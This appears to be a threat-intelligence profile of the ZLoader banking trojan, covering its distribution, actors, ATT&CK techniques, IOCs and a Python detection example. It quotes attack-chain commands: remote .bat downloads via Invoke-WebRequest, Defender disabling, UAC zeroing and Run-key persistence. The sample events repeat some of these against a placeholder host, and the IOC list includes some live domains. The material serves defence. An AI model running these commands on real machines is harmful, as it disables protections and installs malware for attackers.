ZLoader
ZLoader is a banking trojan, also known as Terdot and sometimes referred to as Zbot, first discovered in 2016 and described as a fork/offshoot of the Zeus banking trojan. The malware remains under active development and has evolved beyond banking fraud into a broader loader and access-enablement role.
High-confidence capabilities described in the source material include web injection for theft of cookies, passwords, banking credentials, and other sensitive information; browser cookie theft; credential theft; and newer VNC-based remote access functionality. Multiple sources also describe ZLoader being used as a first-stage loader to enable second-stage malware and ransomware operations. Reported follow-on or associated activity includes delivery or enablement of Cobalt Strike, remote-access backdoors, and ransomware families including Ryuk and Egregor. The content also places ZLoader among malware families increasingly used as loaders for later-stage attacks rather than purely for banking fraud.
Observed infection and distribution methods in the provided content include phishing and malicious email campaigns, malvertising, Google Ads redirection to fake software sites, signed MSI installers, LOLBAS-style execution chains, and MSIX package abuse. One detailed campaign targeted customers of Australian and German financial institutions via a fake TeamViewer site, used a signed MSI, disabled Windows Defender and UAC, established persistence via regsvr32 and a Run key, and injected the final payload into msiexec.exe via thread hijacking. The content also notes targeting of Japanese users via malvertising in another campaign.
The malware is associated in the content with several threat actors and ecosystems. Proofpoint linked TA547 to DanaBot campaigns and noted that the same actor had previously delivered ZLoader. Proofpoint also reported TA544 experimentally targeted Spain with ZLoader. SentinelLabs described a ZLoader campaign tied to the "Tim" botnet. Other reporting in the content links ZLoader to broader cybercrime and ransomware-access ecosystems alongside Trickbot, Qbot, IcedID, Buer Loader, BazaLoader, and SystemBC.
Targeting mentioned in the content includes banking customers and financial institutions, with specific emphasis on Australian and German banks in one campaign and Japanese users in another. Additional references place ZLoader in broader financially motivated campaigns and initial-access activity that can affect multiple sectors.
Indicators and technical traits explicitly mentioned include use of DGA-generated C2 domains in at least one campaign; infrastructure fingerprints such as gate.php on ZLoader domains; more than 350 mapped C2 domains in the Tim botnet reporting; overlap with the googleaktualizacija ZLoader botnet; and example domains/IPs from the SentinelLabs campaign including team-viewer.site, websekir.com, pornofilmspremium.com, mjwougyhwlgewbajxbnn[.]com, 194.58.108[.]89, and 195.24.66[.]70. The content also notes that arithmetic substitution obfuscation techniques seen in other malware were also used by ZLoader, and that similar crypter/unpacking loops were observed in malware droppers such as Ursnif, ZLoader, and Hancitor.
Groups observed using it
5 distinct threat actors attributed by public researchers.
Delivered malware included ZLoader (a.k.a. Terdot), Gootkit, Ursnif, Corebot, Panda Banker, Atmos, Mazar Bot, and Red Alert Android malware.
Spain (defunct): Castilian-language ZLoader lures, medium volume, aimed at Technology, Manufacturing & Hospitality. Campaigns began experimentally in August 2017 and ended in September 2017.
Since the Emotet takedown, Proofpoint observed consistent, ongoing activity from The Trick, Dridex, Qbot, IcedID, ZLoader, Ursnif, and many others in our data serving as first-stage malware payloads in attempts to enable further infections, including ransomware attacks.
MSIX package abuse has been observed in various threat campaigns, including those from FIN7, Zloader (Storm-0569), and FakeBat (Storm-1113).
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development (2 techniques)
Initial Access (2 techniques)
Execution (4 techniques)
This initiates the second stage of the infection chain, downloading the dropper updatescript.bat through the PowerShell cmdlet Invoke-WebRequest... At first, it disables all the Windows Defender modules through the PowerShell cmdlet Set-MpPreference. It then adds exclusions... with the cmdlet Add-MpPreference
It will drop the setup.bat file, triggering the initial infection chain by executing cmd.exe /c setup.bat... The dropper then executes the third stage with the command cmd /c updatescript.bat.
Persistence (2 techniques)
The nsudo.bat script also completely disables UAC by setting the following registry key to 0: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
It then adds a new registry key in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run... This ensures that the attacker’s implant survives machine reboots... The script downloads the file autorun100.bat... and places it in the startup folder
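As an added example (not code from this page or from any of the reports it quotes), the following Python pass runs simple detection logic over constructed, Sysmon-style process-creation and registry-set events that mirror the chain quoted in the Execution and Persistence excerpts above: batch-file staging via cmd.exe /c, a PowerShell Invoke-WebRequest download of a .bat, Defender tampering via Set-MpPreference and Add-MpPreference, EnableLUA set to 0 under Policies\System, and a Run-key autostart. The event layout and field names, the sample command lines, the download URL, file paths and value name are assumptions, not real indicators.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    """One telemetry record; field names are an assumption, loosely modelled on Sysmon."""
    kind: str                 # "process" (process creation) or "registry" (value set)
    image: str                # image path of the acting process
    command_line: str = ""    # full command line (process events)
    target_object: str = ""   # registry path written (registry events)
    details: str = ""         # value written, Sysmon-style, e.g. "DWORD (0x00000000)"


# Constructed sample telemetry mirroring the staged batch-file chain, Defender
# tampering, UAC disablement and Run-key persistence described above. The
# download URL, file paths and value name are placeholders, not real IOCs.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /i TeamViewer_Setup.msi"),
    Event("process", r"C:\Windows\System32\cmd.exe", r"cmd.exe /c setup.bat"),
    Event("process", PS, r"powershell.exe Invoke-WebRequest http://example.invalid/updatescript.bat -OutFile updatescript.bat"),
    Event("process", PS, r"powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"),
    Event("process", PS, r"powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public"),
    Event("registry", r"C:\Windows\System32\reg.exe",
          target_object=r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
          details="DWORD (0x00000000)"),
    Event("registry", r"C:\Windows\System32\reg.exe",
          target_object=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
          details=r"C:\Users\Public\autorun100.bat"),
    Event("process", r"C:\Windows\System32\notepad.exe", r"notepad.exe notes.txt"),  # benign control
]

DEFENCE_IMPAIRMENT = {"defender_disabled", "defender_exclusion_added", "uac_disabled"}
PERSISTENCE = {"run_key_persistence"}


def classify(ev: Event):
    """Return a tag naming the suspicious behaviour in one event, or None."""
    cl = ev.command_line.lower()
    if ev.kind == "process":
        # Defender tampering via the PowerShell cmdlets quoted in the excerpts.
        if "set-mppreference" in cl and "-disable" in cl:
            return "defender_disabled"
        if "add-mppreference" in cl and "-exclusion" in cl:
            return "defender_exclusion_added"
        # cmd.exe /c <something>.bat: batch-file staging of the next stage.
        if ev.image.lower().endswith("\\cmd.exe") and re.search(r"/c\s+\S+\.bat\b", cl):
            return "cmd_batch_execution"
        # PowerShell fetching a .bat with Invoke-WebRequest.
        if "invoke-webrequest" in cl and ".bat" in cl:
            return "powershell_download_batch"
    elif ev.kind == "registry":
        key = ev.target_object.lower()
        # EnableLUA written as zero under the Policies\System key disables UAC.
        if key.endswith("\\policies\\system\\enablelua") and re.search(r"\(0x0+\)", ev.details):
            return "uac_disabled"
        # Any value under ...\CurrentVersion\Run is a reboot-surviving autostart.
        if "\\currentversion\\run\\" in key:
            return "run_key_persistence"
    return None


def scan(events):
    """Return (index, tag) for every event that trips a rule, in input order."""
    return [(i, tag) for i, ev in enumerate(events) if (tag := classify(ev))]


def assess(events):
    """Roll per-event tags up into a verdict: 'high' when defence impairment and
    persistence co-occur (the combination the excerpts describe), 'medium' for
    any single hit, 'none' otherwise."""
    tags = {tag for _, tag in scan(events)}
    if tags & DEFENCE_IMPAIRMENT and tags & PERSISTENCE:
        verdict = "high"
    elif tags:
        verdict = "medium"
    else:
        verdict = "none"
    return {"verdict": verdict, "tags": sorted(tags)}


if __name__ == "__main__":
    for i, tag in scan(SAMPLE_EVENTS):
        print(f"event {i}: {tag}")
    print(assess(SAMPLE_EVENTS))
```

The per-event rules are deliberately narrow string and path matches so they are cheap to port to Sigma; the roll-up in assess() is where the signal comes from, since a Run-key write or a single Defender exclusion on its own is common in legitimate administration, whereas the two together inside one host's timeline is the shape of the chain quoted above.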
Privilege Escalation (5 techniques)
It first creates a new process as a host for the unpacked DLL, and for this sample it uses a new instance of msiexec.exe. Then it allocates and writes 2 RWX memory regions inside the target process.
Then it starts the unpacking by leveraging a process injection technique known as Thread Hijacking... VirtualAllocEx() -> WriteProcessMemory() -> GetThreadContext() -> SetThreadContext() -> ResumeThread()
Stealth (6 techniques)
Apart from the common dynamic loading of Windows API functions and encrypted strings, Bazar Loader relies on arithmetic substitution via identities to obfuscate the code... There are many other samples that have additional reverse engineering counter measures such as junk code, but a quick comparison revealed no functional differences.
The user is tricked into downloading the fake software in a signed MSI format... these other samples suggest that the attackers had multiple campaigns ongoing beyond TeamViewer and which included fakes such as JavaPlug-in.mis, Zoom.mis, and discord.msi.
Defense Impairment (2 techniques)
Credential Access (1 technique)
Command and Control (5 techniques)
SentinelLabs identified the entire infrastructure of the ‘Tim’ botnet, composed of more than 350 recently-registered C2 domains... Some domains implement the gate.php component, which is a fingerprint of the ZLoader botnet.
“…Zloader variant linked to Black Basta ransomware, employing Domain Name System (DNS) tunneling for stealthy command and control…”
This analytic story addresses the increasing trend of adversaries leveraging MSIX installers to deliver malware... multiple threat actors have been observed abusing MSIX files to deliver various malware payloads.
Impact (2 techniques)
Other (1 technique)
IOCs tracked for this family
256 indicators attributed across vendor reports, sandbox runs, and researcher write-ups, covering IPs, domains, and DNS infrastructure linked to this family as well as other indicator types observed in public reporting.
Recent activity
41 sources tracked across advisories, community write-ups, and news.
Named as malware associated with MSIX package abuse.
Zloader is referenced as malware observed in recent malicious MSIX package campaigns using developer-signed packages rather than Microsoft Store-signed packages.
Updated ZLoader variant using DNS tunneling for stealthy C2 and featuring an interactive shell.
Zloader is mentioned as an alternative initial-access malware used in Ryuk-related campaigns that also involved SystemBC.